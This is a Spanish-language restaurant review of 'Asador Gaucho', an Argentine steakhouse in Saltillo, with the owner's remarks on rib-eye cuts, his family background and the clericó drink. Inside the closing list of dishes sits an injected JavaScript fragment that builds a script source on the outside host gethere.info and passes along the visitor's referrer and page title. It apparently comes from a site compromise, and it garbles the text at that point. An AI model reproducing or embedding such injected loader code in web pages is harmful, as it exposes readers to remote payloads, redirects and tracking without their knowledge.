Asador Gaucho: el sabor argentino

La gastronomía argentina se caracteriza por ser experta en carnes, en Saltillo existe un restaurante que hace un homenaje a la tradición culinaria de esta nació, te invitamos a conocer “Asador Gaucho”.

La gastronomía de la Argentina se caracteriza, a diferencia de las gastronomías del resto de América Latina por grandes aportes europeos. En la Argentina se combinan perfectamente, la gastronomía criolla, italiana y española. Lo cual crea para el paladar exquisitas propuestas que sin duda pueden volver loco a cualquier amante de la buena comida. La gastronomía argentina es en esencia carnívora.

De hecho, es conocida en todo el mundo por sus carnes de res de altísima calidad. Los platos típicos cambian muchí- simo de una región a otra, pero hay algunos que son muy populares en todo el mundo.

img_4543

En Saltillo existe un lugar en donde la cocina argentina es homenajeada, y el buen sabor de la carne predomina. “El Asador Gaucho”, es su nombre; se ubica en la esquina de Musa de León y Pedro Figueroa al norte de la ciudad, en el segundo piso de una famosa plaza comercial. Adrián Angeloni fue quien nos invitó a conocer algunas de las propuestas culinarias que “El Asador Gaucho”, ofrece a los saltillenses.

Les presentaremos un corte ribé certificado angus de 2 pulgadas con un contenido graso de un 30 por ciento, es uno de los cortes favoritos de nuestros comensales, tiene mucha textura, suavidad y jugosidad”, explicó Adrián Angeloni, mientras a la mesa llegaba el corte.

Por un momento el corte parece más grande que la vajilla, el aroma es penetrante, los jugos de la carne de inmediato se apoderan del olfato, además la de inmediato llama la atención los acompañantes del corte; un poco de cebollas, las cuales logran aromatizar el corte y un pimiento amarillo con un huevo estrellado y queso dentro, un platillo típico de la Argentina.

El ribé es la mejor parte de la res, una carne de alta calidad, la cual provoca en el paladar, calidad, suavidad y textura. Lo realizamos con la receta de la casa: sal de grano, sal de mar y algunas hierbas, nos preocupamos porque nuestros comensales sientan en su paladar un verdadero sabor a carne”, comentó Adrián.

Ya en la mesa, Adrián nos platicó cómo es que nació “Asador Gaucho”, la tradición familiar gastronómica de su familia fue la que se encargó de crear este lugar.

Vengo de una familia gastronómica, mi madre lleva 40 años en esto, para entregarle a México y en especial a Saltillo una propuesta argentina de buena calidad, decidimos poner el guacho, lo que creemos es la representación de la Argentina”.

Adrián hace cinco años era el encargado de un famoso restaurante de la ciudad, con el cual dice haber tenido experiencias maravillosas, pero con el crecimiento del establecimiento, para Adrián el momento de independizarse y crear “Asador Gaucho”. “Queremos que aquí todos se sientan a gusto, como en casa; ofrecemos buena comida y buen sansón. Aquí puedes pasar un buen día probando la comida autóctona de mi país”, explicó Angeloni, quien ofrece a los saltillenses más de 12 cortes, todos de excelente calidad.

Un sabor para recordar Argentina

Adrian, nos contó que dentro su menú incluye algunas bebidas emblemáticas de la Argentina, entre las que destacan el Clrericó.

El clericó es una bebida alcohólica frutal, recurrida en los días cercanos a las fiestas de fin de año. Según nos contó el líder del “Asador Gaucho”, se prepara mezclando ensalada de frutas cítricas y tropicales como naranja, melón, manzana, ananá, durazno y otras frutas, mezclando vino tinto, vino blanco y vino rosado, un poco de azúcar y hielo.

Adrián Angeloni afirma que esta bebida será del encanto de todos los comensales.

 

img_4504

¡No te puedes quedar sin probarlos!

Caña filete

Salmón

Camarones

Empanadas

Carpachos s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360
360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado